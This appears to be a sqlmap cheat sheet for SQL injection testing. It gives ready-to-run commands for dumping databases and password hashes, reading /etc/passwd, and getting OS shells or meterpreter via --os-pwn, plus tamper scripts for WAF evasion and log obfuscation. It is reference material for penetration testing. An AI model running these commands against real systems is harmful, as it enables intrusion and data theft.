SQLMap - Cheetsheat
Basic arguments for SQLmap
Generic
1
-u "<URL>"
2
-p "<PARAM TO TEST>"
3
--user-agent=SQLMAP
4
--random-agent
5
--threads=10
6
--risk=3 #MAX
7
--level=5 #MAX
8
--dbms="<KNOWN DB TECH>"
9
--os="<OS>"
10
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
11
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
12
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
13
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
14
--proxy=http://127.0.0.1:8080
15
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char
Copied!
Retrieve Information
Internal
1
--current-user #Get current user
2
--is-dba #Check if current user is Admin
3
--hostname #Get hostname
4
--users #Get usernames od DB
5
--passwords #Get passwords of users in DB
6
--privileges #Get privileges
Copied!
DB data
1
--all #Retrieve everything
2
--dump #Dump DBMS database table entries
3
--dbs #Names of the available databases
4
--tables #Tables of a database ( -D <DB NAME> )
5
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
6
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
Copied!
Injection place
From Burp/ZAP capture
Capture the request and create a req.txt file
1
sqlmap -r req.txt --current-user
Copied!
GET Request Injection
1
sqlmap -u "http://example.com/?id=1" -p id
2
sqlmap -u "http://example.com/?id=*" -p id
Copied!
POST Request Injection
1
sqlmap -u "http://example.com" --data "username=*&password=*"
Copied!
Injections in Headers and other HTTP Methods
1
#Inside cookie
2
sqlmap -u "http://example.com" --cookie "mycookies=*"
3
4
#Inside some header
5
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
6
sqlmap -u "http://example.com" --headers="referer:*"
7
8
#PUT Method
9
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
10
11
#The injection is located at the '*'
Copied!
Indicate string when injection is successful
1
--string="string_showed_when_TRUE"
Copied!
Eval
Sqlmap allows the use of
-e or --eval to process each payload before sending it with some python oneliner. This makes very easy and fast to process in custom ways the payload before sending it. In the following example the flask cookie session is signed by flask with the known secret before sending it:1
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
Copied!
Shell
1
#Exec command
2
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
3
4
#Simple Shell
5
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
6
7
#Dropping a reverse-shell / meterpreter
8
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
Copied!
Read File
1
--file-read=/etc/passwd
Copied!
Crawl a website with SQLmap and auto-exploit
1
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
2
3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
4
--crawl = how deep you want to crawl a site
5
--forms = Parse and test forms
Copied!
Second Order Injection
1
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
2
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
Copied!
Customizing Injection
Set a suffix
1
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
Copied!
Prefix
1
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
Copied!
Help finding boolean injection
1
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
2
sqlmap -r r.txt -p id --not-string ridiculous --batch
Copied!
Tamper
nonrecursivereplacement.pyReplaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filterspercentage.pyAdds a percentage sign ('%') infront of each characteroverlongutf8.pyConverts all characters in a given payload (not processing already encoded)randomcase.pyReplaces each keyword character with random case valuerandomcomments.pyAdd random comments to SQL keywordssecuresphere.pyAppends special crafted stringsp_password.pyAppends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logsspace2comment.pyReplaces space character (' ') with commentsspace2dash.pyReplaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')space2hash.pyReplaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')space2morehash.pyReplaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')space2mssqlblank.pyReplaces space character (' ') with a random blank character from a valid set of alternate charactersspace2mssqlhash.pyReplaces space character (' ') with a pound character ('#') followed by a new line ('\n')space2mysqlblank.pyReplaces space character (' ') with a random blank character from a valid set of alternate charactersspace2mysqldash.pyReplaces space character (' ') with a dash comment ('--') followed by a new line ('\n')space2plus.pyReplaces space character (' ') with plus ('+')space2randomblank.pyReplaces space character (' ') with a random blank character from a valid set of alternate characterssymboliclogical.pyReplaces AND and OR logical operators with their symbolic counterparts (&& andunionalltounion.pyReplaces UNION ALL SELECT with UNION SELECTunmagicquotes.pyReplaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)uppercase.pyReplaces each keyword character with upper case value 'INSERT'varnish.pyAppend a HTTP header 'X-originating-IP'versionedkeywords.pyEncloses each non-function keyword with versioned MySQL commentversionedmorekeywords.pyEncloses each keyword with versioned MySQL commentxforwardedfor.py
nonrecursivereplacement.py
Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters
percentage.py
Adds a percentage sign ('%') infront of each character
overlongutf8.py
Converts all characters in a given payload (not processing already encoded)
randomcase.py
Replaces each keyword character with random case value
randomcomments.py
Add random comments to SQL keywords
securesphere.py
Appends special crafted string
sp_password.py
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
space2comment.py
Replaces space character (' ') with comments
space2dash.py
Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
space2hash.py
Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
space2morehash.py
Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
space2mssqlblank.py
Replaces space character (' ') with a random blank character from a valid set of alternate characters
space2mssqlhash.py
Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
space2mysqlblank.py
Replaces space character (' ') with a random blank character from a valid set of alternate characters
space2mysqldash.py
Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
space2plus.py
Replaces space character (' ') with plus ('+')
space2randomblank.py
Replaces space character (' ') with a random blank character from a valid set of alternate characters
symboliclogical.py
Replaces AND and OR logical operators with their symbolic counterparts (&& and
unionalltounion.py
Replaces UNION ALL SELECT with UNION SELECT
unmagicquotes.py
Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
uppercase.py
Replaces each keyword character with upper case value 'INSERT'
varnish.py
Append a HTTP header 'X-originating-IP'
versionedkeywords.py
Encloses each non-function keyword with versioned MySQL comment
versionedmorekeywords.py
Encloses each keyword with versioned MySQL comment
xforwardedfor.py
